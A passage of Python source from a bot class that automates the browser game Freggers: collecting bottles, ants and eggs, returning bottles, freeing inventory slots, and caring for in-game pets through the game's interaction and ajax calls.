for target in self.sort_iso_items_by_distance(list(filter(lambda iso_item: iso_item.gui == gui and iso_item.has_interaction('SEARCH'), self.wob_registry.iso_items))):
self.log('[Bottles] Interacting with {} ({})...'.format(target.name, target.gui))
self.__e_collect.clear()
self.send_item_interaction(target.wob_id, 'SEARCH')
self.__e_collect.wait()
self.wait_random_delay(FreggersBot.MIN_SEARCH_DONE_DELAY, FreggersBot.MAX_SEARCH_DONE_DELAY)
collected_bottles = self.get_item_count(self.localeItems.EMPTY_BOTTLE)
if max_amount != 0 and collected_bottles >= max_amount:
self.__deinit_collect()
return collected_bottles
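# Alternate between two western rooms and SEARCH the 'western.kaktus02' cacti, waiting out a 184-second per-cactus cooldown before retrying one.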
def collect_ants(self, max_amount = 0):
self.__init_collect()
rooms = ['western.indianerdorf', 'western.camp']
len_rooms = len(rooms)
room_index = random.randint(0, len_rooms - 1)
while True:
self.log('[Ants] Collecting {} / {}...'.format(self.__collect_amount, max_amount))
for _ in range(len_rooms):
room = rooms[room_index]
room_index = (room_index + 1) % len_rooms
self.go_to_room('western.rail', False)
self.__e_room_loaded.wait()
self.go_to_room(room, False)
self.__e_room_loaded.wait()
cactuses = list(filter(lambda iso_item: iso_item.gui == 'western.kaktus02', self.wob_registry.iso_items))
lim_cactuses = len(cactuses)
cactus_index = random.randint(0, lim_cactuses - 1)
for _ in range(lim_cactuses):
cactus_wob_id = cactuses[cactus_index].wob_id
cactus_index = (cactus_index + 1) % lim_cactuses
while True:
self.log('[Ants] Interacting with cactus')
self.__e_collect.clear()
self.send_item_interaction(cactus_wob_id, 'SEARCH')
self.__e_collect.wait()
remaining_wait_time = self.__collect_remaining_wait
if remaining_wait_time == 0:
self.__ants_times[cactus_wob_id] = self.__collect_time
self.wait_random_delay(FreggersBot.MIN_SEARCH_DONE_DELAY, FreggersBot.MAX_SEARCH_DONE_DELAY)
if max_amount != 0 and max_amount <= self.__collect_amount:
ants_collected = self.__collect_amount
self.__deinit_collect()
return ants_collected
break
last_cactus_time = self.__ants_times.get(cactus_wob_id)
if last_cactus_time != None:
remaining_wait = 184 - (time.time() - last_cactus_time)
if remaining_wait > 0:
self.log('[Ants]', 'Waiting {} more seconds.'.format(remaining_wait))
time.sleep(remaining_wait)
continue
idle_time = remaining_wait_time + 1 if remaining_wait_time <= 60 else remaining_wait_time * 0.75
self.log('[Ants]', 'Waiting {} seconds before retrying.'.format(idle_time))
time.sleep(idle_time)
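# Visit a random area (never one of the last two picked) and SEARCH the listed props in each of its rooms until max_amount eggs have been created.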
def collect_eggs(self, max_amount = 0):
self.__init_collect()
room_guis = [{'plattenbau.metro': ['hood.getraenkedoserot'],
'plattenbau.plattenbau': ['hood.getraenkedoserot'],
'plattenbau.bolzplatz': ['wutzlhofen.plaza_hydrant']},
{'wutzlhofen.plaza': ['wutzlhofen.plaza_hydrant'],
'wutzlhofen.diner': ['wutzlhofen.diner_kuehlschrank'],
'wutzlhofen.passage': ['wutzlhofen.buchsbaum'],
'wutzlhofen.disko': ['wutzlhofen.disko_boxenturm'],
'wutzlhofen.wohlwert': ['wutzlhofen.wohlwert_wohlwertkiste'],
'wutzlhofen.schach': ['wutzlhofen.schach_baumstumpf'],
'wutzlhofen.museum': ['wutzlhofen.museum_schaukasten1'],
'wutzlhofen.uferpromenade': ['wutzlhofen.uferpromenade_kiosk'],
'wutzlhofen.kroetenbank': ['wutzlhofen.kroetenbank_schirmstaender'],
'wutzlhofen.flussdampfer': ['wutzlhofen.flussdampfer_belueftung']},
{'hood.gym': ['hood.gym_pressbank1', 'hood.gym_gewicht'],
'hood.punk': ['hood.punk_punktisch'],
'hood.backalley': ['hood.backalley_ziegelstapel', 'hood.ghettoblaster'],
'hood.waschsalon': ['hood.waschsalon_aschenbecher', 'hood.waschsalon_waeschekorb'],
'hood.friseur': ['hood.getraenkedoserot'],
'hood.outskirts': ['hood.zeitschriftenhaufen', 'hood.ghettoblaster'],
'hood.hiphop': ['hood.hiphop_hiphopghetto']},
{'western.rail': ['western.kaktus02', 'western.kaktus03'],
'western.fort': ['western.fort_pulverfass', 'western.kanone2'],
'western.saloonzimmer3': ['western.badezuber'],
'western.saloonzimmer2': ['western.badezuber'],
'western.camp': ['western.camp_geige'],
'western.indianerdorf': ['western.kaktus01']},
{'tp_botanik.cafe': ['tp_botanik.loungetisch', 'tp_botanik.spiralentisch']},
{'beach.beach3': ['western.kaktus03'],
'beach.beach2': ['western.kaktus03']},
{'gothics.raum9': ['gothics.raum9_tisch_rund'],
'gothics.gruft': ['wutzlhofen.fu_ku2009_pizzabox_002'],
'gothics.waldraum02': ['wutzlhofen.schach_baumstumpf']}]
len_areas = len(room_guis)
_last_area_indices = [-1, -1]
def next_area():
i = random.randint(0, len_areas - 1)
while i == _last_area_indices[0] or i == _last_area_indices[1]:
i = random.randint(0, len_areas - 1)
_last_area_indices[1] = _last_area_indices[0]
_last_area_indices[0] = i
return i
while True:
self.log('[Eggs] Collecting {} / {}...'.format(self.__collect_amount, max_amount))
for room_label, guis in room_guis[next_area()].items():
self.go_to_room(room_label, False)
self.__e_room_loaded.wait()
search_targets = list(filter(lambda iso_item: iso_item.gui in guis and iso_item.has_interaction('SEARCH'), self.wob_registry.iso_items))
lim_targets = len(search_targets)
target_index = 0 if lim_targets < 2 else random.randint(0, lim_targets - 1)
for _ in range(lim_targets):
target = search_targets[target_index]
target_wob_id = target.wob_id
target_index = (target_index + 1) % lim_targets
self.log('[Eggs] Interacting with {} ({})...'.format(target.name, target.gui))
self.__e_collect.clear()
self.send_item_interaction(target_wob_id, 'SEARCH')
self.__e_collect.wait()
self.wait_random_delay(FreggersBot.MIN_SEARCH_DONE_DELAY, FreggersBot.MAX_SEARCH_DONE_DELAY)
if max_amount != 0 and self.__collect_amount >= max_amount:
collected_eggs = self.__collect_amount
self.__deinit_collect()
return collected_eggs
def __cb_success(self, data):
self.__success = True
self.__e_success_cb.set()
def __cb_failure(self, data):
self.__success = False
self.__e_success_cb.set()
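# Walk to western.backlands and SEARCH the covered wagon ('western.planwagen'). NOTIFY_CREATE_ITEM signals success, SHOW_ACTION_FEEDBACK signals failure.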
def search_covered_wagon(self):
self.log('Searching covered wagon...')
if self.room.room_context_label != 'western.backlands':
if self.room.room_context_label != 'western.indianerdorf':
self.go_to_room('western.rail', False)
self.__e_room_loaded.wait()
self.go_to_room('western.indianerdorf', False)
self.__e_room_loaded.wait()
self.go_to_room('western.backlands', False)
self.__e_room_loaded.wait()
self.__success = False
for item in self.wob_registry.iso_items:
if item.gui == 'western.planwagen':
self.__e_success_cb.clear()
self.register_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
self.send_item_interaction(item.wob_id, 'SEARCH')
self.__e_success_cb.wait()
self.unregister_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
break
self.log('Successfully searched covered wagon:', self.__success)
return self.__success
def search_noisy_construction_site(self):
self.log('Searching noisy construction site...')
self.go_to_room('hood.strasse', False)
self.__e_room_loaded.wait()
self.go_to_room('hood.outskirts', False)
self.__e_room_loaded.wait()
self.__success = False
for item in self.wob_registry.iso_items:
if item.gui == 'wutzlhofen.baustelle':
self.__e_success_cb.clear()
self.register_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
self.send_item_interaction(item.wob_id, 'SEARCH')
self.__e_success_cb.wait()
self.unregister_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
break
self.log('Successfully searched noisy construction site:', self.__success)
return self.__success
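# Deliver up to 'amount' lazy ants to the anthill in gothics.eule, accepting more ants from the item queue (bounded by usable slots) whenever the inventory runs out.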
def deliver_ants(self, amount):
ants_in_queue = None
inv = self.ajax_request_inventory()
ants_in_inv = self.count_items(inv, self.localeItems.LAZY_ANTS)
if ants_in_inv == 0 and not self.ensure_empty_slots(1):
self.log('[Deliver Ants] No inventory slots available.')
return 0
inv = self.ajax_request_inventory()
ants_in_inv = self.count_items(inv, self.localeItems.LAZY_ANTS)
slots_usable = FreggersBot.count_empty_slots(inv) + ants_in_inv
self.go_to_room('gothics.raum9', False)
self.__e_room_loaded.wait()
self.go_to_room('gothics.friedhof', False)
self.__e_room_loaded.wait()
self.go_to_room('gothics.eule', False)
self.__e_room_loaded.wait()
wob_id = None
for item in self.wob_registry.iso_items:
if item.gui == 'wutzlhofen.ameisenhaufen_bug':
wob_id = item.wob_id
if wob_id == None:
self.log('[Deliver Ants] Anthill not found.')
return 0
self.__expect_deliver_event = False
self.__ants_delivered_amount = 0
self.__ant_delivered_success = False
self.__e_ant_delivered = threading.Event()
def handle_timer_bar(data):
if self.__expect_deliver_event:
self.debug('[Deliver Ants] Timer bar:', data)
self.__expect_deliver_event = False
self.__ant_delivered_success = True
self.__e_ant_delivered.set()
def handle_show_action(data):
if self.__expect_deliver_event:
self.debug('[Deliver Ants] Show action:', data)
self.__expect_deliver_event = False
self.__ant_delivered_success = False
self.__e_ant_delivered.set()
self.register_callback(Event.SHOW_ACTION_FEEDBACK, handle_show_action)
self.register_callback(Event.SHOW_TIMER_BAR, handle_timer_bar)
if ants_in_inv < amount:
ants_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.LAZY_ANTS)
deliver_amount = min(amount, ants_in_inv + (0 if ants_in_queue == None else len(ants_in_queue)))
delivered_amount = 0
while delivered_amount < deliver_amount:
remaining_amount = deliver_amount - delivered_amount
if ants_in_inv == 0:
accept_amount = min(slots_usable, remaining_amount)
for _ in range(accept_amount):
ant_in_queue = ants_in_queue.pop(0)
self.ajax_inbox_action(ant_in_queue['id'], Freggers.INBOX_ACTION_ACCEPT)
ants_in_inv = self.count_items(self.ajax_request_inventory(), self.localeItems.LAZY_ANTS)
if ants_in_inv < remaining_amount:
ants_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.LAZY_ANTS)
else:
self.__expect_deliver_event = True
self.__e_ant_delivered.clear()
self.send_item_interaction(wob_id, 'DELIVER_ANT')
self.__e_ant_delivered.wait()
if self.__ant_delivered_success:
self.log('[Deliver Ants] Successfully delivered ant.')
self.__ant_delivered_success = False
delivered_amount += 1
ants_in_inv -= 1
self.wait_random_delay(1, 1.8)
else:
self.log('[Deliver Ants] No ant in inventory to deliver.')
ants_in_inv = self.count_items(self.ajax_request_inventory(), self.localeItems.LAZY_ANTS)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, handle_show_action)
self.unregister_callback(Event.SHOW_TIMER_BAR, handle_timer_bar)
del self.__ants_delivered_amount
del self.__e_ant_delivered
del self.__expect_deliver_event
return delivered_amount
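# Return up to 'amount' empty bottles at the reverse vending machine in hood.outskirts, refilling from the item queue as needed. Unless beer_crates is True, beer crates are deleted first to keep slots free.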
def return_bottles(self, amount, beer_crates = False):
bottles_in_queue = None
inv = self.ajax_request_inventory()
bottles_in_inv = self.count_items(inv, self.localeItems.EMPTY_BOTTLE)
if not beer_crates:
for item in list(inv):
if item != None and item['description'] == self.localeItems.BEER_CRATE:
self.delete_item(item)
inv.remove(item)
if bottles_in_inv == 0 and not self.ensure_empty_slots(1):
self.log('[Return Bottles] No inventory slots available.')
return 0
inv = self.ajax_request_inventory()
bottles_in_inv = self.count_items(inv, self.localeItems.EMPTY_BOTTLE)
slots_usable = FreggersBot.count_empty_slots(inv) + bottles_in_inv
self.go_to_room('hood.strasse', False)
self.__e_room_loaded.wait()
self.go_to_room('hood.outskirts', False)
self.__e_room_loaded.wait()
target = self.find_item_by_gui('hood.recyclingautomat')
if target == None:
self.log('[Return Bottles] Could not find reverse vending machine.')
return 0
wob_id = target.wob_id
self.__expect_return_event = False
self.__bottles_returned_amount = 0
self.__bottles_returned_success = False
self.__e_bottles_returned = threading.Event()
def handle_timer_bar(data):
if self.__expect_return_event:
self.log('[Return Bottles] Timer bar:', data)
self.__expect_return_event = False
self.__bottles_returned_success = True
self.__e_bottles_returned.set()
def handle_show_action(data):
if self.__expect_return_event:
self.log('[Return Bottles] Show action:', data)
self.__expect_return_event = False
self.__bottles_returned_success = False
self.__e_bottles_returned.set()
self.register_callback(Event.SHOW_ACTION_FEEDBACK, handle_show_action)
self.register_callback(Event.SHOW_TIMER_BAR, handle_timer_bar)
if bottles_in_inv < amount:
bottles_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.EMPTY_BOTTLE)
return_amount = min(amount, bottles_in_inv + (0 if bottles_in_queue == None else len(bottles_in_queue)))
returned_amount = 0
while returned_amount < return_amount:
remaining_amount = return_amount - returned_amount
if bottles_in_inv == 0:
accept_amount = min(slots_usable, remaining_amount)
for _ in range(accept_amount):
bottle_in_queue = bottles_in_queue.pop(0)
self.ajax_inbox_action(bottle_in_queue['id'], Freggers.INBOX_ACTION_ACCEPT)
bottles_in_inv = self.count_items(self.ajax_request_inventory(), self.localeItems.EMPTY_BOTTLE)
if bottles_in_inv < remaining_amount:
bottles_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.EMPTY_BOTTLE)
else:
self.__expect_return_event = True
self.__e_bottles_returned.clear()
self.send_item_interaction(wob_id, 'RETURN_EMPTY_BOTTLE')
self.__e_bottles_returned.wait()
if self.__bottles_returned_success:
self.log('[Return Bottles] Successfully returned empty bottle.')
self.__bottles_returned_success = False
returned_amount += 1
bottles_in_inv -= 1
self.wait_random_delay(1, 1.8)
else:
self.log('[Return Bottles] No empty bottle in inventory to return.')
bottles_in_inv = self.count_items(self.ajax_request_inventory(), self.localeItems.EMPTY_BOTTLE)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, handle_show_action)
self.unregister_callback(Event.SHOW_TIMER_BAR, handle_timer_bar)
del self.__bottles_returned_amount
del self.__e_bottles_returned
del self.__expect_return_event
self.log('[Return Bottles] Returned {} empty bottles.'.format(returned_amount))
return returned_amount
def __handle_level(self, data):
time_now = time.time()
self.debug('Level data updated:', data)
self.level_data = data
self.level_data_timestamp = time_now
self.__e_level_data.set()
@staticmethod
def contains(iterable, matchFunc):
for item in iterable:
if matchFunc(item):
return True
return False
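# Free at least 'count' inventory slots, escalating through: deleting trash items, throwing away effects, deleting disposable consumables, and finally depositing items into the bank locker.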
def ensure_empty_slots(self, count, inv = None):
if inv == None:
inv = self.ajax_request_inventory()
remaining_slots = count - FreggersBot.count_empty_slots(inv)
if remaining_slots > 0:
self.log('Ensuring {}/{} empty slot(s) in inventory...'.format(remaining_slots, count))
deleted_slot_count = self.delete_trash_items(inv = inv)[0]
remaining_slots -= deleted_slot_count
self.log('Deleted {} trash items.'.format(deleted_slot_count))
if remaining_slots > 0:
self.log('Throwing away effects...')
self.__e_room_loaded.wait()
effect_slots, effect_count = self.throw_away_effects(inv = inv)
if effect_slots > 0:
self.log('Threw away {} effect(s) from {} slot(s).'.format(effect_count, effect_slots))
remaining_slots -= effect_slots
if remaining_slots > 0:
self.log('Deleting disposable consumables...')
disposable_item_names = self.disposable_consuamables
deleted_items = 0
for item in list(inv):
if item != None and item['description'] in disposable_item_names:
if self.delete_item(item):
deleted_items += 1
remaining_slots -= 1
inv.remove(item)
if remaining_slots == 0:
break
if deleted_items > 0:
self.log('Deleted {} items.'.format(deleted_items))
if remaining_slots > 0:
self.log('Trying to store {} more items in the locker...'.format(remaining_slots))
locker_inv = self.ajax_request_locker()
empty_locker_slots = FreggersBot.count_empty_slots(locker_inv)
if remaining_slots <= empty_locker_slots:
self.log('Going to store {} items in the locker...'.format(remaining_slots))
self.go_to_room('wutzlhofen.kroetenbank', False)
self.__e_room_loaded.wait()
self.log('Waiting for locker to be opened.')
locker = self.find_item_by_gui('wutzlhofen.kroetenbank_schliessfaecher')
event_wait = self.get_wait_for_event(Event.ACTION_OPEN_LOCKER)
self.send_item_interaction(locker.wob_id, 'USE')
inv_prefered = list(filter(lambda item: item != None and item['description'] in self.prefered_store_items, inv))
inv_non_consumables = list(filter(lambda item: item != None and item['description'] not in self.consumable_items, inv))
event_wait.wait_once()
self.log('Locker was opened.')
deposited_items = 0
while remaining_slots > 0 and len(inv) > 0:
item = None
if len(inv_prefered) > 0:
item = inv_prefered.pop()
if item in inv_non_consumables:
inv_non_consumables.remove(item) # avoid a second inv.remove on the same item later
self.debug('Storing preferred item in locker:', item)
inv.remove(item)
elif len(inv_non_consumables) > 0:
item = inv_non_consumables.pop()
self.debug('Storing non-consumable item in locker:', item)
inv.remove(item)
else:
item = inv.pop()
if item != None:
if self.ajax_deposit_item(item['id']):
remaining_slots -= 1
deposited_items += 1
self.log('Deposited {} items in locker.'.format(deposited_items))
return remaining_slots == 0
else:
self.log('Not enough slots available in locker. There are only {} empty slots to store {} items.'.format(empty_locker_slots, remaining_slots))
return False
return True
def closest_room_item(self, item_gui):
self.__e_room_loaded.wait()
return self.closest_iso_item(self.find_items_by_gui(item_gui))
def closest_iso_item(self, iso_items):
if len(iso_items) > 1:
if self.player != None:
player_pos = self.player.iso_obj.get_uvz()
closest_distance = -1
closest_item = None
for iso_item in iso_items:
distance = iso_item.iso_obj.get_uvz().distance(player_pos)
if distance < closest_distance or closest_distance == -1:
closest_item = iso_item
closest_distance = distance
return closest_item
else:
return None
return None if len(iso_items) == 0 else iso_items[0]
def get_room_items_by_distance(self):
return self.sort_iso_items_by_distance(self.wob_registry.iso_items)
def sort_iso_items_by_distance(self, iso_items, player = None):
if player == None:
player = self.player
if len(iso_items) > 1:
if player != None:
player_pos = player.iso_obj.get_uvz()
return sorted(list(iso_items), key = lambda x: x.iso_obj.get_uvz().distance(player_pos))
else:
return None
return iso_items
def pickup_room_item(self, wob_id):
return ItemPickup(self, wob_id).pickup_once()
def search_room_item(self, wob_id):
return ItemSearch(self, wob_id).search_once()
def pickup_closest_room_item(self, item_gui):
item = self.closest_room_item(item_gui)
if item != None:
return self.pickup_room_item(item.wob_id)
return False
def search_closest_room_item(self, item_gui):
item = self.closest_room_item(item_gui)
if item != None:
return self.search_room_item(item.wob_id)
return False
def pickup_any(self, item_gui):
pickup = ItemPickup(self, 0)
for iso_item in self.get_room_items_by_distance():
if iso_item.gui == item_gui:
pickup.wob_id = iso_item.wob_id
if pickup.pickup():
pickup.cleanup()
return iso_item
pickup.cleanup()
return None
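# Return the inventory entry for item_name, accepting it from the item queue or buying it (relation_id/price) if necessary. Returns -1 when no slot could be freed and 0 when the item could not be obtained.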
def ensure_item_in_inv(self, item_name, relation_id = 0, price = 0):
for inv_item in self.ajax_request_inventory():
if inv_item != None and inv_item['description'] == item_name:
return inv_item
if self.ensure_empty_slots(1):
for queue_item in self.ajax_request_item_queue():
if queue_item['description'] == item_name:
self.ajax_inbox_action(queue_item['id'], Freggers.INBOX_ACTION_ACCEPT)
return queue_item
if relation_id != 0 and price != 0:
if self.ajax_buy_item(relation_id, price):
for inv_item in self.ajax_request_inventory():
if inv_item != None and inv_item['description'] == item_name:
return inv_item
else:
return -1
return 0
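# Go to the player's own room and cuddle the Pompom whenever its 'hintbubble' property asks for it. Returns True once its item_description no longer contains a counter, False after five failed cuddle attempts.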
def care_pompom(self, room, exact):
room += '#@#' + str(self.user_id)
self.go_to_room(room, exact)
self.__e_room_loaded.wait()
self.log('[Pompom] Looking for Pompom to cuddle.')
for item in self.wob_registry.iso_items:
for interaction in item.interactions:
if interaction.label == 'CUDDLE_POMPOM':
pompom_wob_id = item.wob_id
event = threading.Event()
def cb(data):
event.set()
self.register_callback(Event.SHOW_TIMER_BAR, cb)
cuddle_count = 0
self.log('[Pompom] Found Pompom.')
failure_count = 0
while True:
for property in item.get_properties():
if property.key == 'hintbubble' and property.value == 'cuddle_me':
event.clear()
self.log('[Pompom] Cuddling...')
self.send_item_interaction(pompom_wob_id, 'CUDDLE_POMPOM')
if event.wait(5):
time.sleep(1)
failure_count = 0
cuddle_count += 1
self.log('[Pompom] Cuddled {} times.'.format(cuddle_count))
self.wait_random_delay(20, 23)
else:
failure_count += 1
if failure_count >= 5:
self.log('[Pompom] Cannot cuddle - aborting.')
self.unregister_callback(Event.SHOW_TIMER_BAR, cb)
return False
elif property.key == 'item_description' and len([int(s) for s in property.value.split() if s.isdigit()]) == 0:
self.log('[Pompom] Pompom is happy for now.')
self.unregister_callback(Event.SHOW_TIMER_BAR, cb)
return True
time.sleep(0.3)
self.log('[Pompom] Could not find Pompom in room.')
return False
def __care_pet_give_effect(self, wob_id, effect_name, relation_id, price):
self.log('[PetCare] Ensuring effect \'{}\' is in inventory...'.format(effect_name))
item = self.ensure_item_in_inv(effect_name, relation_id, price)
if isinstance(item, dict): # ensure_item_in_inv may also return 0 or -1 on failure
self.log('[PetCare] Throwing effect \'{}\' at {}...'.format(effect_name, wob_id))
self.ajax_item_usewith(item['id'], wob_id)
return True
else:
self.log('[PetCare] Could not make sure effect \'{}\' is in inventory.'.format(effect_name))
return False
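# Core pet-care loop: read the pet's 'hintbubble' property and service each request (drinks, food, blankets, cleanup, effects, ...) until the pet reports it is happy.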
def __care_pet(self, wob_id, room, exact):
# Dragon egg TRANSFORM
while True:
wob = self.wob_registry.get_object_by_wobid(wob_id)
if wob == None:
self.log('[PetCare] Pet was not found!')
break
primary_interaction = wob.get_primary_interaction()
if primary_interaction != None and primary_interaction.label == 'PONY_HELP' and len(wob.interactions) == 6:
self.log('[PetCare] Pet \'{}\' - {} is happy for now.'.format(wob.name, wob.gui))
break
for property in wob.get_properties():
if property.key == 'hintbubble':
hint = property.value
if hint == 'drink_dragon' or hint == 'drink_pony':
pony_drink = hint == 'drink_pony'
drink_name = self.localeItems.HORSE_MILK if pony_drink else self.localeItems.DRAGON_MILK
drink_source_gui = 'tp_botanik.milchwagen_horse' if pony_drink else 'tp_botanik.fueldispenser_dragon'
self.log('[PetCare] Pet wants to drink \'{}\'.'.format(drink_name))
inv = self.ajax_request_inventory()
drinks = FreggersBot.filter_item(inv, drink_name)
if len(drinks) == 0:
self.log('[PetCare] No \'{}\' in inventory.'.format(drink_name))
if not self.ensure_empty_slots(1):
self.log('[PetCare] No inventory space available.')
return False
drinks_in_queue = FreggersBot.filter_item(self.ajax_request_item_queue(), drink_name)
if len(drinks_in_queue) == 0:
self.log('[PetCare] No \'{}\' in item queue either. Collecting new...'.format(drink_name))
self.go_to_room('tp_botanik.fairy', False)
self.__e_room_loaded.wait()
drink_source = self.find_item_by_gui(drink_source_gui)
if drink_source != None:
self.log('[PetCare] Drink source found.')
self.__e_success_cb.clear()
self.register_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
count = 0
for _ in range(3):
self.__e_success_cb.clear()
self.send_item_interaction(drink_source.wob_id, 'SEARCH')
self.__e_success_cb.wait()
if not self.__success:
break
count += 1
self.log('[PetCare] Collected drink \'{}\' {} times.'.format(drink_name, count))
self.unregister_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
else:
self.log('[PetCare] Could not find drink source for \'{}\'.'.format(drink_name))
return False
self.log('[PetCare] Going back to room {}.'.format(room))
self.go_to_room(room, exact)
self.__e_room_loaded.wait()
else:
self.log('[PetCare] Requesting \'{}\' from item queue...'.format(drink_name))
queued_drink = drinks_in_queue.pop(0)
self.ajax_inbox_action(queued_drink['id'], Freggers.INBOX_ACTION_ACCEPT)
self.log('[PetCare] Successfully accepted \'{}\' from item queue.'.format(drink_name))
self.log('[PetCare] Giving \'{}\' to \'{}\' - {}...'.format(drink_name, wob.name, wob.gui))
self.send_item_interaction(wob_id, 'PONY_MILK' if pony_drink else 'DRAGON_FUEL')
time.sleep(2.5)
self.log('[PetCare] Gave \'{}\' - {} its drink.'.format(wob.name, wob.gui))
elif hint == 'cuddle_me':
self.log('[PetCare] Pet needs to be cuddled.')
self.__e_timer_bar.clear()
self.send_item_interaction(wob_id, 'PET')
self.__e_timer_bar.wait()
time.sleep(self.timer_bar)
elif hint == 'blanket_purple' or hint == 'blanket_green':
self.log('[PetCare] Pet needs blanket.')
green_blanket = hint == 'blanket_green'
inv = self.ajax_request_inventory()
imgurl = 'tp_botanik/kuscheldeckegruen_horse' if green_blanket else 'tp_botanik/kuscheldecke_horse'
blankets = list(filter(lambda item: item != None and imgurl in item['imgurl'], inv))
if len(blankets) == 0:
self.log('[PetCare] No blanket in inventory.')
if not self.ensure_empty_slots(1):
self.log('[PetCare] No inventory space available.')
return False
blankets_in_queue = list(filter(lambda item: item != None and imgurl in item['imgurl'], self.ajax_request_item_queue()))
if len(blankets_in_queue) == 0:
self.log('[PetCare] No blanket in item queue. Trying to pickup from room...')
blanket_gui = 'tp_botanik.kuscheldeckegruen_horse' if green_blanket else 'tp_botanik.kuscheldecke_horse'
if self.pickup_closest_room_item(blanket_gui):
self.log('[PetCare] Blanket picked up.')
else:
self.log('[PetCare] Buying new blanket...')
self.ajax_buy_item(2401 if green_blanket else 2400, 20)
self.log('[PetCare] Bought new blanket.')
else:
blanket = blankets_in_queue.pop(0)
self.ajax_inbox_action(blanket['id'], Freggers.INBOX_ACTION_ACCEPT)
self.log('[PetCare] Giving blanket to pet...')
self.send_item_interaction(wob_id, primary_interaction.label)
time.sleep(2.5)
elif hint == 'no_blanket_purple' or hint == 'no_blanket_green':
self.log('[PetCare] Pet wants removal of blanket.')
self.send_item_interaction(wob_id, 'PONY_NO_BLANKET_PURPLE' if hint == 'no_blanket_purple' else 'PONY_NO_BLANKET_GREEN')
time.sleep(2.5)
elif hint == 'no_diaper':
self.log('[PetCare] Pet wants removal of diaper.')
for item in self.wob_registry.iso_items.copy():
if item.gui == 'tp_botanik.windel_horse':
self.send_item_interaction(item.wob_id, 'USE')
time.sleep(0.9 + 2)
elif hint == 'no_dung':
self.log('[PetCare] Pet wants removal of dung.')
for item in self.wob_registry.iso_items.copy():
if item.gui == 'tp_botanik.pferdeapfel2_horse':
self.send_item_interaction(item.wob_id, 'USE')
time.sleep(0.9 + 2)
elif hint == 'musical_box':
self.log('[PetCare] Pet wants music to be played.')
for item in self.wob_registry.iso_items:
if item.gui == 'tp_botanik.spieluhr_horse':
self.send_item_interaction(item.wob_id, 'USE')
time.sleep(5)
break
elif hint == 'mixed_drink_dragon' or hint == 'mixed_drink_pony':
pony_drink = hint == 'mixed_drink_pony'
drink_name = self.localeItems.HORSE_MIXED_MILK if pony_drink else self.localeItems.DRAGON_MIXED_MILK
self.log('[PetCare] Pet needs mixed drink \'{}\'.'.format(drink_name))
inv = self.ajax_request_inventory()
mixed_drinks = FreggersBot.filter_item(inv, drink_name)
if len(mixed_drinks) == 0:
self.log('[PetCare] There are no \'{}\' in inventory.'.format(drink_name))
ingredient_name = self.localeItems.STRAWBERRY if pony_drink else self.localeItems.CHILI
ingredient_source_gui = 'tp_botanik.erdbeerstaude_horse' if pony_drink else 'tp_botanik.chilistaude_dragon'
ingredients = FreggersBot.filter_item(inv, ingredient_name)
ingredient_present = len(ingredients) > 0
milk_name = self.localeItems.HORSE_MILK if pony_drink else self.localeItems.DRAGON_MILK
milk_source_gui = 'tp_botanik.milchwagen_horse' if pony_drink else 'tp_botanik.fueldispenser_dragon'
milks = FreggersBot.filter_item(inv, milk_name)
milk_present = len(milks) > 0
empty_slots_needed = (0 if ingredient_present else 1) + (0 if milk_present else 1)
if empty_slots_needed > 0:
if not self.ensure_empty_slots(empty_slots_needed):
self.log('[PetCare] No inventory space available.')
return False
inv_queue = self.ajax_request_item_queue()
ingredients_in_queue = FreggersBot.filter_item(inv_queue, ingredient_name)
milks_in_queue = FreggersBot.filter_item(inv_queue, milk_name)
if len(ingredients_in_queue) > 0:
ingredient = ingredients_in_queue.pop()
self.ajax_inbox_action(ingredient['id'], Freggers.INBOX_ACTION_ACCEPT)
ingredients.append(ingredient)
inv.append(ingredient)
ingredient_present = True
if len(milks_in_queue) > 0:
milk = milks_in_queue.pop()
self.ajax_inbox_action(milk['id'], Freggers.INBOX_ACTION_ACCEPT)
milks.append(milk)
inv.append(milk)
milk_present = True
if not milk_present or not ingredient_present:
self.go_to_room('tp_botanik.fairy', False)
self.__e_room_loaded.wait()
ingredient_source = self.find_item_by_gui(ingredient_source_gui)
milk_source = self.find_item_by_gui(milk_source_gui)
search = ItemSearch(self, 0)
milk_collected = 0
ingredient_collected = 0
if not milk_present and not ingredient_present:
search.wob_id = ingredient_source.wob_id
if not search.search():
self.log('[PetCare] Could not collect ingredient \'{}\'.'.format(ingredient_name))
return False
search.wob_id = milk_source.wob_id
if not search.search():
self.log('[PetCare] Could not collect milk \'{}\'.'.format(milk_name))
return False
milk_collected += 1
ingredient_collected += 1
self.log('[PetCare] Collected both ingredients \'{}\' and \'{}\' to mix \'{}\'.'.format(milk_name, ingredient_name, drink_name))
search.wob_id = milk_source.wob_id
for _ in range(max(0, 3 - len(milks) - len(milks_in_queue) - milk_collected)):
if not search.search():
self.log('[PetCare] Could not collect milk \'{}\'.'.format(milk_name))
return False
search.wob_id = ingredient_source.wob_id
for _ in range(max(0, 3 - len(ingredients) - len(ingredients_in_queue) - ingredient_collected)):
if not search.search():
self.log('[PetCare] Could not collect ingredient \'{}\'.'.format(ingredient_name))
return False
search.cleanup()
self.log('[PetCare] Going back to room {}.'.format(room))
self.go_to_room(room, exact)
self.__e_room_loaded.wait()
if self.ajax_item_interact(FreggersBot.filter_item(self.ajax_request_inventory(), milk_name)[0]['id'], 'MIX'):
self.log('[PetCare] Mixed \'{}\' and \'{}\' to \'{}\'.'.format(milk_name, ingredient_name, drink_name))
else:
self.log('[PetCare] Error mixing \'{}\' and \'{}\' to \'{}\'.'.format(milk_name, ingredient_name, drink_name))
return False
